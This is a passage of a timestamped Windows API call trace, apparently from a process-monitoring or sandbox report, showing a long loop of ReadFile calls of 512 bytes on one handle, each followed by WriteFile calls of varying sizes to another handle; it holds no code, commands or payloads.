lpOverlapped=0x0) returned 1 [0023.259] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.259] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.260] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.260] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.261] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x13a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.261] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.262] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.262] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1eb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.263] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.263] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.264] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x189, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.264] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.265] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.265] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.265] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.266] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.266] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1e5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.267] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.267] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.268] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1b5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.268] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.269] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.269] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1bb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.270] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.270] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.271] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xb8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.271] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.272] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.272] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x199, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.273] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.273] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.274] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x13b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.274] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.274] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.275] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x16e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.275] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.276] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.276] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.277] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.277] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.278] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.278] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.279] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.279] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.280] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.280] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.281] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1e6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.281] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.282] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.282] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.283] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.283] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.283] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x357, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.284] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.285] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x22b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.285] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.286] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.286] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.286] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.287] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.287] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.288] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.288] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x288, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.289] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.289] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x342, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.290] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.290] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ff, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.290] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.291] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.291] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.292] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x244, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.292] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.293] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x261, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.293] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.294] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x268, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.294] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.295] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x349, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.295] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.296] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x318, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.296] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.296] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.297] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.297] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.298] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.298] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x371, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.299] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.299] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.301] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.302] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.302] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.303] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.303] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.303] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.304] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.304] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.305] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x294, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.305] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.306] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ec, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.306] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.307] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, 